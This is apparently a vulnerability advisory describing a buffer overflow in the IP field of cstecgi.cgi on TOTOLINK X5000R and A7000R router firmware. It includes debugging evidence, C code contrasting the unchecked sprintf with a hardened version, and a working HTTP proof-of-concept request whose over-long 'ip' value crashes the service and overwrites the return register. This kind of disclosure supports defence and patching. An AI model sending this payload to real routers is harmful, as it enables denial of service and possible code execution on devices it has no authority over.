Vulnerability Information_1.md

Vulnerability Title: TOTOLINK X5000R V9.1.0u.6118-B20201102 and A7000R V9.1.0u.6115-B20201022: buffer overflow in the IP field, which can cause denial of service and even arbitrary code execution

Affected versions: X5000R V9.1.0u.6118-B20201102, A7000R V9.1.0u.6115-B20201022

Discovered on: December 20, 2023

Discovered by: He Nan (2777256035@qq.com)

Analysis report:

When the sub_41F7E8 function in /www/cgi-bin/cstecgi.cgi (using the X5000R firmware as an example) is triggered, it copies the content of the IP field with sprintf. The length of the data is never checked, so an over-long IP field overflows the destination buffer.

[Screenshot: image-20240304170217712]

Attack demonstration:

Send a normal request to the vulnerable interface of the router with an IP field of four A's; the response comes back with a normal 200 status.

[Screenshot: image-20240304170622236]

If the IP field is instead filled with a large amount of junk data, the response is a 500 status code.

[Screenshot: image-20240304170724634]

Debugging inside the router over telnet shows that the $ra register has been overwritten with 0x61616161 (the bytes "aaaa" from the payload), which means the execution flow can be redirected to any known address in the process and code executed from there.

[Screenshot: image-20240304170910942]
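The unchecked sprintf copy described above, beside a bounded alternative, as an added example written for this page and not TOTOLINK's firmware code: the format string, the buffer size and the function names are assumptions, since the advisory only shows the disassembly in a screenshot.

```c
#include <stdio.h>
#include <string.h>
#include <arpa/inet.h>   /* inet_pton, INET_ADDRSTRLEN */

#define CMD_BUF 128      /* assumed size of the fixed stack buffer */

/* Reconstruction of the pattern the advisory describes (hypothetical
 * format string and buffer size): the "ip" field is formatted straight
 * into a fixed-size stack buffer with no length check, so a field longer
 * than the buffer runs past it and reaches the saved return address
 * ($ra on MIPS), which is the 0x61616161 seen in the debugger. */
void vulnerable_set_diag(const char *ip)
{
    char cmd[CMD_BUF];
    sprintf(cmd, "ip=%s", ip);      /* unbounded copy */
    (void)cmd;
}

/* Hardened form: accept only a syntactically valid dotted-quad IPv4
 * literal, then bound the copy and treat truncation as an error.
 * Returns 0 and fills out[] on success, -1 if the field is rejected. */
int hardened_set_diag(const char *ip, char *out, size_t out_len)
{
    struct in_addr addr;
    if (ip == NULL || strlen(ip) >= INET_ADDRSTRLEN)
        return -1;                              /* too long for an IPv4 literal */
    if (inet_pton(AF_INET, ip, &addr) != 1)
        return -1;                              /* not of the form a.b.c.d */
    int n = snprintf(out, out_len, "ip=%s", ip);
    if (n < 0 || (size_t)n >= out_len)
        return -1;                              /* would have truncated */
    return 0;
}

/* Builds a constructed "ip" value of n 'a' bytes, like the advisory's PoC
 * body, into dst (which must hold n + 1 bytes). */
void make_junk_ip(char *dst, size_t n)
{
    memset(dst, 'a', n);
    dst[n] = '\0';
}

int main(void)
{
    char out[CMD_BUF], junk[600];
    make_junk_ip(junk, sizeof junk - 1);
    printf("valid: %d\n", hardened_set_diag("192.168.0.1", out, sizeof out));
    printf("aaaa:  %d\n", hardened_set_diag("aaaa", out, sizeof out));
    printf("junk:  %d\n", hardened_set_diag(junk, out, sizeof out));
    return 0;
}
```

The validation belongs at the point where the JSON field is parsed; snprintf alone only caps the damage, while rejecting non-address input removes the overflow and the 500 responses the advisory observed.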

POC

```http
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content-Length: 742
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/login.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

{"ip":"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa","num":"2","topicurl":"setDiagnosisCfg"}
```